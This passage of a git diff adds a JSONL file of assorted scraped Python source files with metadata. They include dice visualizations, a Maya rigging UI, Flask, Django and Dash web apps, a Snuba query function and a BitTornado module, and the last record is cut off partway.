diff --git "a/4589.jsonl" "b/4589.jsonl" new file mode 100644--- /dev/null +++ "b/4589.jsonl" @@ -0,0 +1,755 @@ +{"seq_id":"71588137","text":"\"\"\"Visualização do lançamento dos dados\"\"\"\nimport pygal\nfrom dice import Dice\n\n# Numero de tentativas\nROLL_NUMBER = 50000\n\n\ndef test_d6():\n \"\"\"Visualização do lançamento dos dados D6\"\"\"\n # Cria um D6\n dice = Dice()\n # Faz alguns lançamentos e armazena os resultados em uma Lista\n results = [dice.roll() for _ in range(ROLL_NUMBER)]\n\n frequencies = [results.count(value) for value in range(1, dice.num_sides + 1)]\n\n # Visualiza os resultados\n hist = pygal.Bar()\n hist.title = \"Resultado de \" + str(ROLL_NUMBER) + \" de tentativas.\"\n hist.x_labels = list(range(1, dice.num_sides + 1))\n hist.x_title = \"Resultado\"\n hist.y_title = \"Frequencia dos resultados\"\n\n hist.add('D6', frequencies)\n hist.render_to_file(\"dice_visual.svg\")\n\n\ndef test_pair_d6():\n \"\"\"Visualização do lançamento dos dados D6 - um para de dados\"\"\"\n # Cria dois D6\n dice_1 = Dice(6)\n dice_2 = Dice(10)\n\n # Faz alguns lançamentos e armazena os resultados em uma Lista\n results = [dice_1.roll() + dice_2.roll() for _ in range(ROLL_NUMBER)]\n\n max_result = dice_1.num_sides + dice_2.num_sides\n\n frequencies = [results.count(value) for value in range(2, max_result + 1)]\n\n # Visualiza os resultados\n hist = pygal.Bar()\n\n hist.title = f\"Resultado de {ROLL_NUMBER} de tentativas de dois dados.\"\n hist.x_labels = list(range(2, max_result + 1))\n hist.x_title = \"Resultado\"\n hist.y_title = \"Frequencia dos resultados\"\n\n hist.add('D6 + D6', frequencies)\n hist.render_to_file(\"dice_visual_pair.svg\")\n\n\ndef main():\n \"\"\"Funçaõ main\"\"\"\n test_pair_d6()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"intro/dice_visual.py","file_name":"dice_visual.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"217087399","text":"import maya.cmds as cmds\r\nimport CPOutliner as Outliner\r\nimport Rename\r\nimport GenJoints\r\nimport CreateControls\r\nimport ReFK as FK\r\nimport GenBFKV2 as BFK\r\nimport SwitchV2 as SpSwitch\r\nimport ZeroOrients as ZeroOri\r\nimport CenterLocator as CenLoc\r\nimport RandomScatter as Scatter\r\nimport DelHistory\r\nimport ConstrainAll as ConstAll\r\nimport DoubleParent as DPar\r\nimport FreezeTransforms as Freeze\r\n\r\n#Set up window\r\ndef Suite():\r\n winN = \"Suite\"\r\n LoadWin(winN)\r\n \r\n switchTxt = (\"**First: Select all the weight targets.\\n\"\r\n \"Second: Select the object to be constrained.\\n\"\r\n \"Third: Select the control with the 'Follow' attribute.\\n\"\r\n \"Finally: Click the button.\")\r\n \r\n #Set up layout\r\n wrapperLay = cmds.columnLayout(adj=True, cw=600, w=600)\r\n layMain = cmds.gridLayout(nc = 2, cw = 275, cr=True, p=wrapperLay)\r\n \r\n #Outliner\r\n outliner = cmds.button(l=\"Outliner\", p=wrapperLay, c=lambda *args: Outliner.Popup())\r\n \r\n #Parent and Scale Constrain\r\n constAll_Lay = cmds.gridLayout(nc=2, cwh=[275, 100], p=wrapperLay)\r\n constAll_L = cmds.text(l=\"Parent and Scale Constrain:\\t\", p=constAll_Lay)\r\n LoadConstraint(constAll_Lay, ConstAll)\r\n \r\n #Double Parent Constrain\r\n dPar_Lay = cmds.gridLayout(nc=2, cwh=[275, 100], p=wrapperLay)\r\n dPar_L = cmds.text(l=\"Double Parent Constrain:\\t\", p=dPar_Lay)\r\n LoadConstraint(dPar_Lay, DPar)\r\n \r\n #Delete History\r\n delHis = cmds.button(l=\"Delete History\", c=lambda *args: DelHistory.Del(), p=layMain)\r\n \r\n #Freeze Transforms\r\n freeze = cmds.button(l=\"Freeze Transforms\", c=lambda *args: Freeze.Freeze(), p=layMain)\r\n \r\n #Renamer\r\n rName_L = cmds.textField(p=layMain)\r\n rName = cmds.button(l=\"Rename\", c=lambda *args: Rename.Rename(cmds.textField(rName_L, q=True, tx=True)), p=layMain)\r\n \r\n #Center Locator\r\n cenLoc = cmds.button(l=\"Create Center Locator\", c=lambda *args: CenLoc.Center(), p=layMain)\r\n \r\n #Create Joints\r\n jnts = cmds.button(l=\"Generate Joint Chain\", c=lambda *args: GenJoints.Generate(), p=layMain)\r\n \r\n #Zero Joint Orient\r\n currentAxis = \"Z\"\r\n jntO = cmds.button(l=\"Zero Joint Orients\", c=lambda *args: ZeroOri.Zero(cmds.ls(sl=True), currentAxis), p=layMain)\r\n LoadRadio(currentAxis, layMain)\r\n \r\n #Create Controls\r\n ctrls = cmds.button(l=\"Generate Controls\", c=lambda *args: CreateControls.Generate(), p=layMain)\r\n \r\n #Basic FK\r\n genFK = cmds.button(l=\"Generate Basic FK\", c=lambda *args: FK.CreateControls(), p=layMain)\r\n \r\n #Broken FK\r\n genBFK = cmds.button(l=\"Generate Broken FK\", c=lambda *args: BFK.CreateControls(), p=layMain)\r\n \r\n #Space Switch\r\n sSwitch = cmds.button(l=\"Switched Parent Constraint\", c=lambda *args: SpSwitch.Switch(), p=wrapperLay)\r\n sSwitch_L = cmds.text(l = switchTxt, al = \"center\", p=wrapperLay)\r\n \r\n #Random placement\r\n rand_L = cmds.text(l=\"RANDOM DUPLICATOR\", al=\"left\", p=wrapperLay)\r\n LoadScatter(wrapperLay)\r\n \r\n cmds.showWindow(winN)\r\n \r\n#Replace window if it already exists\r\ndef LoadWin(winName):\r\n if cmds.window(winName, exists=True):\r\n cmds.deleteUI(winName, wnd=True)\r\n cmds.window(winName)\r\n\r\n#Clean orients - radio button layout\r\ndef LoadRadio(cAx, lay):\r\n aY = \"Y\"\r\n aZ = \"Z\"\r\n \r\n jntO_Grp = cmds.gridLayout(nc=3, cw = .3 * cmds.gridLayout(lay, q=True, cw=True), p=lay)\r\n jntO_L = cmds.text(l=\"Secondary Axis:\", w = .5 * cmds.gridLayout(lay, q=True, cw=True))\r\n jntO_Col = cmds.radioCollection(p=jntO_Grp)\r\n jntO_RadioY = cmds.radioButton(l=aY, cl=jntO_Col, p=jntO_Grp, onc=lambda *args: OrientAxis(cAx, aY))\r\n jntO_RadioZ = cmds.radioButton(l=aZ, cl=jntO_Col, p=jntO_Grp, onc=lambda *args: OrientAxis(cAx, aZ))\r\n\r\n#Clean orients - set selected axis\r\ndef OrientAxis(cax, axis):\r\n cax = axis\r\n\r\n#Random scatter - layout\r\ndef LoadScatter(lay):\r\n scatterLay = cmds.columnLayout(p=lay)\r\n checks = cmds.gridLayout(nc=3, cw=100, p=scatterLay)\r\n moveCheck = cmds.checkBox(l=\"Translate\", v=True, p=checks)\r\n rotCheck = cmds.checkBox(l=\"Rotate\", v=True, p=checks)\r\n scaleCheck = cmds.checkBox(l=\"Scale\", v=True, p=checks)\r\n dups_L = cmds.text(l=\"Number of Duplicates\", p=scatterLay)\r\n dups = cmds.intField(v=10, p=scatterLay)\r\n \r\n limitsLay = cmds.gridLayout(nc=3, cw=100, p=scatterLay)\r\n numX_L = cmds.text(l=\"Max X Translate\", p=limitsLay)\r\n numY_L = cmds.text(l=\"Max Y Translate\", p=limitsLay)\r\n numZ_L = cmds.text(l=\"Max Z Translate\", p=limitsLay)\r\n numX = cmds.floatField(v=10, p=limitsLay)\r\n numY = cmds.floatField(v=10, p=limitsLay)\r\n numZ = cmds.floatField(v=10, p=limitsLay)\r\n \r\n scat = cmds.button(l=\"Scatter\", c=lambda *args: Scatter.Scatter(cmds.intField(dups, q=True, v=True),\r\n cmds.floatField(numX, q=True, v=True), cmds.floatField(numY, q=True, v=True), cmds.floatField(numZ, q=True, v=True),\r\n cmds.checkBox(moveCheck, q=True, v=True), cmds.checkBox(rotCheck, q=True, v=True), cmds.checkBox(scaleCheck, q=True, v=True)),\r\n p=scatterLay)\r\n\r\ndef LoadConstraint(lay, script):\r\n constLay = cmds.columnLayout(w=550, p=lay)\r\n single = cmds.button(l=\"Constrain Last Selection to All\", w=275, c=lambda *args: script.Single())\r\n all = cmds.button(l=\"Constrain All to First Selection\", w=275, c=lambda *args: script.All())\r\n each = cmds.button(l=\"Constrain in Pairs: Second to First\", w=275, c=lambda *args: script.Each())\r\n\r\nSuite()","sub_path":"Maya/Rigging/Scripts/Python/Python Suite/Suite.py","file_name":"Suite.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"620969859","text":"import fileinput\n\nsmall_data_set = 200\nlarge_data_set = pow(10, 6)\n\n\ndef main():\n test_case = input()\n\n t = int(test_case)\n if not 1 <= t or not t <= 100:\n print('1 <= T <= 100')\n return\n\n for i in range(t):\n input_n = input()\n n = int(input_n)\n\n sheep_list, index = [], 1\n # counting sheep!\n while True:\n calc_sheep = str(n * index)\n for sheep in calc_sheep:\n if sheep not in sheep_list:\n sheep_list.append(sheep)\n\n # check asleep\n if len(sheep_list) == 10:\n break\n\n # check small data set\n if len(sheep_list) < 5 and index > small_data_set:\n calc_sheep = 'INSOMNIA'\n break\n\n if len(sheep_list) >= 5 and index > large_data_set:\n calc_sheep = 'INSOMNIA'\n break\n\n # increase index\n index += 1\n\n print('Case #{}: {}'.format(i+1, calc_sheep))\n\nmain()\n\n","sub_path":"codes/CodeJamCrawler/16_0_1/teddy.bear/problem_1.py","file_name":"problem_1.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"436272838","text":"import numpy as np\nfrom flask import Flask, request, jsonify, render_template,redirect,url_for\nimport json\nfrom cust import *\nfrom servercalc import *\nfrom os import path\n\napp = Flask(__name__)\n\n@app.route('/',methods=['GET','POST'])\n\ndef home():\n \n return render_template('index.html')\n\n@app.route('/customerEncryption',methods=['GET','POST'])\ndef customerEncryption():\n if not path.exists('custkeys.json'):\n storeKeys()\n \n pub_key, priv_key = getKeys()\n \n features = [int(x) for x in request.form.values()]\n datafileCustomer=serializeDataCustomer(pub_key,features)\n with open('data.json', 'w') as file: \n json.dump(datafileCustomer, file)\n \n keys=[pub_key,priv_key]\n return render_template('cust.html',keys=keys)\n\n@app.route('/company',methods=['GET','POST'])\ndef company():\n datafileCompany=serializeDataCompany()\n with open('answer.json', 'w') as file:\n json.dump(datafileCompany,file)\n\t\t\n \n return render_template('company.html',datafileCompany=datafileCompany)\n \n #return redirect(url_for('result'))\n\n@app.route('/result',methods=['GET','POST'])\ndef result():\n answer_file=loadAnswer()\n answer_key=paillier.PaillierPublicKey(n=int(answer_file['pubkey']['n']))\n answer = paillier.EncryptedNumber(answer_key, int(answer_file['values'][0]), int(answer_file['values'][1]))\n pub_key, priv_key = getKeys()\n if (answer_key==pub_key):\n final_result=priv_key.decrypt(answer)\n \t\n \n return render_template('result.html',final_result=final_result)\n\n \nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"371730583","text":"import json\n\nfrom django.contrib.auth import get_user_model\nfrom django.core.urlresolvers import reverse\nfrom django.test.client import Client\n\nfrom elastimorphic.tests.base import BaseIndexableTestCase\n\nfrom bulbs.promotion.models import ContentList, ContentListHistory\n\nfrom tests.testcontent.models import TestContentObj\n\n\nclass PromotionApiTestCase(BaseIndexableTestCase):\n\n def test_content_list_api(self):\n User = get_user_model()\n admin = User.objects.create_user(\"admin\", \"tech@theonion.com\", \"secret\")\n admin.is_staff = True\n admin.save()\n client = Client()\n client.login(username=\"admin\", password=\"secret\")\n\n content_list = ContentList.objects.create(name=\"homepage\")\n data = []\n for i in range(10):\n content = TestContentObj.objects.create(\n title=\"Content test #{}\".format(i),\n )\n data.append({\"id\": content.pk})\n\n content_list.data = data\n content_list.save()\n\n endpoint = reverse(\"contentlist-detail\", kwargs={\"pk\": content_list.pk})\n response = client.get(endpoint)\n self.assertEqual(response.status_code, 200)\n for index, content in enumerate(response.data[\"content\"]):\n self.assertEqual(content[\"title\"], \"Content test #{}\".format(index))\n\n new_data = response.data\n # This sucks, but it just reverses the list\n new_data[\"content\"] = [{\"id\": content[\"id\"]} for content in response.data[\"content\"]][::-1]\n\n self.assertEqual(ContentListHistory.objects.count(), 0)\n\n response = client.put(endpoint, json.dumps(new_data), content_type=\"application/json\")\n self.assertEqual(response.status_code, 200)\n for index, content in enumerate(response.data[\"content\"]):\n self.assertEqual(content[\"title\"], \"Content test #{}\".format(9 - index))\n\n self.assertEqual(ContentListHistory.objects.count(), 1)\n content_list = ContentList.objects.get(name=content_list.name)\n self.assertEqual(ContentListHistory.objects.get().data, content_list.data)\n","sub_path":"tests/promotion/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"432404774","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport dash\n\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\n\nfrom app import app, data, categoryColumns\nfrom components.data_viewer import DataViewer\nfrom components.configuration_panel import ConfigurationPanel\nfrom components.pie_chart_component import PieChartComponent\nfrom components.bar_chart_component import BarChartComponent\nfrom components.years_of_code_component import YearsOfCodeComponent\nfrom dash.dependencies import Input, Output\n\n\napp.layout = html.Div(\n [\n dcc.Store(id='config-store', data={\n 'selectedCountries': [],\n 'selectedAgeRange': [],\n 'selectedGenders': []\n }),\n html.Div(\n [\n html.H1('StackOverflow Survey 2019'),\n html.P('Authors: Bartłomiej Mroziński, Piotr Pawlik',\n className='authors')\n ],\n className='app-header'\n ),\n html.Div(\n [\n ConfigurationPanel.render(),\n YearsOfCodeComponent.render(),\n ],\n className='first-section'\n ),\n html.Div(\n [\n PieChartComponent.render(\n 'OpSys', categoryColumns, 'OpSys'),\n PieChartComponent.render(\n 'DevEnviron', categoryColumns, 'DevEnviron'),\n PieChartComponent.render(\n 'Containers', categoryColumns, 'Containers')\n ],\n className='piecharts-container'\n ),\n dcc.Tabs(id='tabs-example', value='language', children=[\n dcc.Tab(\n BarChartComponent.render(\n ['LanguageWorkedWith', 'LanguageDesireNextYear']),\n label='Language',\n value='language'\n ),\n dcc.Tab(\n BarChartComponent.render(\n ['DatabaseWorkedWith', 'DatabaseDesireNextYear']),\n label='Database',\n value='database'\n ),\n dcc.Tab(\n BarChartComponent.render(\n ['PlatformWorkedWith', 'PlatformDesireNextYear']),\n label='Platform',\n value='platform'\n ),\n dcc.Tab(\n BarChartComponent.render(\n ['WebFrameWorkedWith', 'WebFrameDesireNextYear']),\n label='Web Framework',\n value='webframework'\n ),\n dcc.Tab(\n BarChartComponent.render(\n ['MiscTechWorkedWith', 'MiscTechDesireNextYear']),\n label='Misc Tech',\n value='misctech'\n ),\n ]),\n DataViewer.render()\n ],\n className='app-container',\n)\n\nif __name__ == '__main__':\n appPort = os.environ.get('PORT', 8050)\n app.run_server(host='0.0.0.0', port=appPort, debug=False)\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"70921836","text":"def raw_query(start, end, groupby=None, conditions=None, filter_keys=None, aggregations=None, rollup=None, arrayjoin=None, limit=None, offset=None, orderby=None, having=None, referrer=None, is_grouprelease=False, selected_columns=None, totals=None, limitby=None, turbo=False):\n '\\n Sends a query to snuba.\\n\\n `conditions`: A list of (column, operator, literal) conditions to be passed\\n to the query. Conditions that we know will not have to be translated should\\n be passed this way (eg tag[foo] = bar).\\n\\n `filter_keys`: A dictionary of {col: [key, ...]} that will be converted\\n into \"col IN (key, ...)\" conditions. These are used to restrict the query to\\n known sets of project/issue/environment/release etc. Appropriate\\n translations (eg. from environment model ID to environment name) are\\n performed on the query, and the inverse translation performed on the\\n result. The project_id(s) to restrict the query to will also be\\n automatically inferred from these keys.\\n\\n `aggregations` a list of (aggregation_function, column, alias) tuples to be\\n passed to the query.\\n '\n start = naiveify_datetime(start)\n end = naiveify_datetime(end)\n groupby = (groupby or [])\n conditions = (conditions or [])\n having = (having or [])\n aggregations = (aggregations or [])\n filter_keys = (filter_keys or {\n \n })\n selected_columns = (selected_columns or [])\n with timer('get_snuba_map'):\n (forward, reverse) = get_snuba_translators(filter_keys, is_grouprelease=is_grouprelease)\n if ('project_id' in filter_keys):\n project_ids = list(set(filter_keys['project_id']))\n elif filter_keys:\n with timer('get_related_project_ids'):\n ids = [get_related_project_ids(k, filter_keys[k]) for k in filter_keys]\n project_ids = list(set.union(*map(set, ids)))\n else:\n project_ids = []\n for (col, keys) in six.iteritems(forward(filter_keys.copy())):\n if keys:\n if ((len(keys) == 1) and (None in keys)):\n conditions.append((col, 'IS NULL', None))\n else:\n conditions.append((col, 'IN', keys))\n if (not project_ids):\n raise UnqualifiedQueryError('No project_id filter, or none could be inferred from other filters.')\n project = Project.objects.get(pk=project_ids[0])\n retention = quotas.get_event_retention(organization=Organization(project.organization_id))\n if retention:\n start = max(start, (datetime.utcnow() - timedelta(days=retention)))\n if (start > end):\n raise QueryOutsideRetentionError\n if (referrer != 'tsdb'):\n (start, end) = shrink_time_window(filter_keys.get('issue'), start, end)\n if (start > end):\n raise QueryOutsideGroupActivityError\n request = {k: v for (k, v) in six.iteritems({\n 'from_date': start.isoformat(),\n 'to_date': end.isoformat(),\n 'conditions': conditions,\n 'having': having,\n 'groupby': groupby,\n 'totals': totals,\n 'project': project_ids,\n 'aggregations': aggregations,\n 'granularity': rollup,\n 'arrayjoin': arrayjoin,\n 'limit': limit,\n 'offset': offset,\n 'limitby': limitby,\n 'orderby': orderby,\n 'selected_columns': selected_columns,\n 'turbo': turbo,\n }) if (v is not None)}\n request.update(OVERRIDE_OPTIONS)\n headers = {\n \n }\n if referrer:\n headers['referer'] = referrer\n try:\n with timer('snuba_query'):\n response = _snuba_pool.urlopen('POST', '/query', body=json.dumps(request), headers=headers)\n except urllib3.exceptions.HTTPError as err:\n raise SnubaError(err)\n try:\n body = json.loads(response.data)\n except ValueError:\n raise UnexpectedResponseError('Could not decode JSON response: {}'.format(response.data))\n if (response.status != 200):\n if body.get('error'):\n error = body['error']\n if (response.status == 429):\n raise RateLimitExceeded(error['message'])\n elif (error['type'] == 'schema'):\n raise SchemaValidationError(error['message'])\n elif (error['type'] == 'clickhouse'):\n if (error['code'] == 43):\n raise QueryIllegalTypeOfArgument(error['message'])\n elif (error['code'] == 241):\n raise QueryMemoryLimitExceeded(error['message'])\n else:\n raise QueryExecutionError(error['message'])\n else:\n raise SnubaError(error['message'])\n else:\n raise SnubaError('HTTP {}'.format(response.status))\n body['data'] = [reverse(d) for d in body['data']]\n return body","sub_path":"Data Set/bug-fixing-5/96d7365c416cf65c5d7a5d30fe5553d8d2edb7dd--fix.py","file_name":"96d7365c416cf65c5d7a5d30fe5553d8d2edb7dd--fix.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"651118321","text":"from __future__ import print_function\nimport math as m\nimport numpy as np\nimport pandas as pd\nfrom scipy.spatial import cKDTree\n\n\ndef match_etaphi(ref_etaphi, trigger_etaphi, trigger_pt, deltaR=0.2, return_positional=False):\n '''Match objects within a given DeltaR.\n\n If return_positional = False\n Returns the panda index of the best match (highest-pt)\n and of all the matches\n If return_positional = True\n Returns the position of the best match (highest-pt)\n and of all the matches in the input trigger_etaphi and trigger_pt arrays.\n '''\n # print (\"INPUT ref_etaphi\")\n # print (ref_etaphi)\n # print (\"INPUT trigger_etaphi\")\n # print (trigger_etaphi)\n # print (\"INPUT trigger_pt\")\n # print (trigger_pt)\n kdtree = cKDTree(trigger_etaphi)\n best_match_indices = {}\n all_matches_indices = {}\n\n # for iref,(eta,phi) in enumerate(ref_etaphi):\n for index, row in ref_etaphi.iterrows():\n gen_eta, gen_phi = row.values\n matched = kdtree.query_ball_point([gen_eta, gen_phi], deltaR)\n # not this in an integer of the index of the array not the index in the pandas meaning: hence to beused with iloc\n # Handle the -pi pi transition\n matched_sym = kdtree.query_ball_point([gen_eta, gen_phi-np.sign(gen_phi)*2.*m.pi], deltaR)\n matched = np.unique(np.concatenate((matched, matched_sym))).astype(int)\n # print ('matched iloc:')\n # print (matched)\n # print type(matched)\n # print trigger_pt[matched]\n # print trigger_etaphi.iloc[matched]\n # Choose the match with highest pT\n if (len(matched) != 0):\n # print (trigger_pt.iloc[matched])\n # print (trigger_pt.iloc[matched].idxmax())\n # print (np.argmax(trigger_pt.iloc[matched]))\n\n if return_positional:\n best_match_indices[index] = matched[np.argmax(trigger_pt.iloc[matched])]\n all_matches_indices[index] = matched\n else:\n best_match = trigger_pt.iloc[matched].idxmax()\n best_match_indices[index] = best_match\n all_matches_indices[index] = trigger_pt.iloc[matched].index.values\n\n # print ('best match:')\n # print (best_match)\n # best_match_indices[index] = best_match\n # all_matches_indices[index] = trigger_pt.iloc[matched].index.values\n # print (trigger_pt.iloc[matched].index.values)\n\n # print best_match_indices\n # print all_matches_indices\n return best_match_indices, all_matches_indices\n\n\ndef debugPrintOut(level, name, toCount, toPrint, max_lines=-1):\n if level == 0:\n return\n if level >= 3:\n print(('# {}: {}'.format(name, len(toCount))))\n if level >= 4 and not toPrint.empty:\n print(max_lines)\n if max_lines != -1:\n with pd.option_context('display.max_rows', max_lines, 'display.max_columns', None,):\n print(toPrint)\n else:\n print(toPrint)\n","sub_path":"python/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"134739873","text":"from random import randint\r\n\r\n# Constants\r\nproduct_name = 'LH-ABC'\r\nversion_short = '3.3.0.2'\r\nversion = version_short + ' (' + product_name + ' - BitTornado 0.3.18)'\r\nuser_agent = product_name + '/' + version_short\r\nauthor = \"Roee Shlomo\"\r\nhome_page = \"http://code.google.com/p/lh-abc\"\r\nreport_email = 'lh.abc.support@gmail.com'\r\nbuild_number = 228\r\n\r\n# PeerID\r\nmapbase64 = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz.-'\r\nprefix = \"-\" + product_name[:2] + ''.join(version_short.split('.')) + \"-\"\r\nprefix = prefix.upper()\r\n\r\ndef createPeerID():\r\n peerid = prefix\r\n while len(peerid) < 20:\r\n peerid += mapbase64[randint(0, 61)]\r\n return peerid\r\n","sub_path":"BitTornado/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"432251499","text":"import datetime\n\nfrom django.utils import timezone\n\nfrom functional_tests import graphql_utils\n\nPOST_QUERY = \"\"\"\nquery GetPostBySlug($slug: String!) {\n post(slug: $slug) {\n author {\n id\n name\n }\n content\n published\n rendered\n slug\n title\n updated\n }\n}\n\"\"\"\n\n\ndef test_get_post(api_client, post_factory):\n \"\"\"\n Users should be able to query for a published post by its slug.\n \"\"\"\n post = post_factory(\n content=\"A post that should be fetch-able.\", title=\"Published Post\"\n )\n expected = {\n \"author\": {\"id\": str(post.author.id), \"name\": post.author.name},\n \"content\": post.content,\n \"published\": post.published.isoformat(),\n \"rendered\": post.rendered,\n \"slug\": post.slug,\n \"title\": post.title,\n \"updated\": post.updated.isoformat(),\n }\n\n response = api_client.query(POST_QUERY, variables={\"slug\": post.slug})\n response.raise_for_status()\n\n assert response.status_code == 200\n assert response.json() == {\"data\": {\"post\": expected}}\n\n\ndef test_get_post_unpublished(api_client, post_factory):\n \"\"\"\n Attempting to fetch an unpublished post should behave the same as if\n the post didn't exist.\n \"\"\"\n now = timezone.now()\n later = now + datetime.timedelta(days=1)\n post = post_factory(published=later)\n\n response = api_client.query(POST_QUERY, variables={\"slug\": post.slug})\n response.raise_for_status()\n\n assert response.status_code == 200\n graphql_utils.assert_has_error(\n response.json(), \"Post matching query does not exist.\", path=[\"post\"]\n )\n","sub_path":"darksite/functional_tests/blog/test_get_post.py","file_name":"test_get_post.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"488108831","text":"# coding=utf-8\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.http import Http404\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic.base import TemplateView\n\nfrom dialogs.forms import MessageForm\nfrom dialogs.models import Dialog\n\n\nclass DialogView(TemplateView):\n template_name = 'dialogs/dialog.html'\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n self.opponent = None\n self.dialog = None\n self.form = None\n if 'user_id' in kwargs:\n self.opponent = get_object_or_404(get_user_model(), pk=kwargs['user_id'])\n self.dialog = Dialog.objects.get_or_create(request.user, self.opponent)\n if not self.dialog:\n raise Http404\n self.form = MessageForm(request.POST or None)\n return super(DialogView, self).dispatch(request, *args, **kwargs)\n\n def get_dialogs(self):\n qs = Dialog.objects.for_user(self.request.user).select_related('user1', 'user2').filter(\n last_message__isnull=False\n ).order_by('-last_message__created')\n paginator = Paginator(qs, 2)\n page = self.request.GET.get('dialogs-page')\n try:\n items = paginator.page(page)\n except PageNotAnInteger:\n items = paginator.page(1)\n except EmptyPage:\n items = paginator.page(paginator.num_pages)\n return items\n\n def get_messages(self):\n if not self.dialog:\n return\n paginator = Paginator(self.dialog.messages.select_related('sender'), 2)\n page = self.request.GET.get('messages-page')\n try:\n items = paginator.page(page)\n except PageNotAnInteger:\n items = paginator.page(1)\n except EmptyPage:\n items = paginator.page(paginator.num_pages)\n return items\n\n def get_context_data(self, **kwargs):\n context = super(DialogView, self).get_context_data(**kwargs)\n context['dialogs'] = self.get_dialogs()\n context['opponent'] = self.opponent\n context['dialog_messages'] = self.get_messages()\n context['form'] = self.form\n return context\n\n def post(self, request, *args, **kwargs):\n if self.form and self.form.is_valid():\n message = self.form.save(commit=False)\n message.dialog = self.dialog\n message.sender = request.user\n message.save()\n return redirect(request.path)\n return self.get(request, *args, **kwargs)\n","sub_path":"dialogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"593101394","text":"from model.user import User\n\n\ndef test_add_user(app, db, data_users, check_ui):\n contact = data_users\n # формирование списка контактов\n old_user_list = db.get_user_list()\n # добавление контакта\n app.user.add(contact)\n # формирование нового списка пользователей\n new_user_list = db.get_user_list()\n # проверка, что новый список длиннее старого на 1\n assert len(old_user_list) + 1 == len(new_user_list)\n # добавление контакта в старый список\n old_user_list.append(contact)\n # проверка совпадения контактов из старого и нового списков\n assert sorted(old_user_list, key=User.id_or_max) == sorted(new_user_list, key=User.id_or_max)\n if check_ui:\n assert sorted(new_user_list, key=User.id_or_max) == sorted(app.user.get_user_list(), key=User.id_or_max)","sub_path":"test/test_add_user.py","file_name":"test_add_user.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"346017640","text":"from cs50 import SQL\nfrom flask import Flask, flash, redirect, render_template, request, session, url_for\nfrom flask_session import Session\nfrom passlib.apps import custom_app_context as pwd_context\nfrom tempfile import gettempdir\nfrom Euclid import gcd, lcm\nfrom polynomials1 import polynomial\n\nfrom helpers import *\n\n# configure application\napp = Flask(__name__)\n\n# ensure responses aren't cached\nif app.config[\"DEBUG\"]:\n @app.after_request\n def after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n# configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_FILE_DIR\"] = gettempdir()\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n\n@app.route(\"/start\")\ndef index():\n return render_template(\"start.html\")\n \n\n@app.route(\"/euclid\", methods=[\"GET\", \"POST\"])\ndef euclid():\n \"\"\"Compute the gcd and lcm of two numbers\"\"\"\n \n # render the template \"euclid\"\n if request.method == \"GET\":\n return render_template(\"euclid.html\")\n \n if request.method == \"POST\":\n \n # if the first number is not provided, return apology\n if not request.form.get(\"first\"):\n return apology(\"must provide a number\")\n \n # if the second number not provided, return apology\n if not request.form.get(\"second\"):\n return apology(\"must provide a number\")\n\n # extract the numbers from the request form\n first = int(request.form.get(\"first\")) \n second = int(request.form.get(\"second\"))\n\n # if numbers less than 0, return apology\n if first <= 0:\n return apology(\"must provide a positive integer\")\n \n if second <= 0:\n return apology(\"must provide a positive integer\")\n \n # calculate gcd and lcm\n divisor = gcd(first, second)\n multiplicity = lcm(first, second)\n \n # render a template that will show the results\n return render_template(\"gcd_lcm.html\", x = first, y = second, gcd = divisor, lcm = multiplicity)\n \n@app.route(\"/polynomials\", methods=[\"GET\", \"POST\"])\ndef polynomials():\n \"\"\"Type the degrees of the dividend and the divisor\"\"\"\n \n # render the template \"polynomial\"\n if request.method == \"GET\":\n return render_template(\"polynomials.html\")\n \n if request.method == \"POST\":\n \n # if the first number is not provided, return apology\n if not request.form.get(\"first\"):\n return apology(\"must provide the degree of the dividend\")\n \n # extract the degree of the dividend from the request form\n first = int(request.form.get(\"first\"))\n \n # if the second number not provided, return apology\n if not 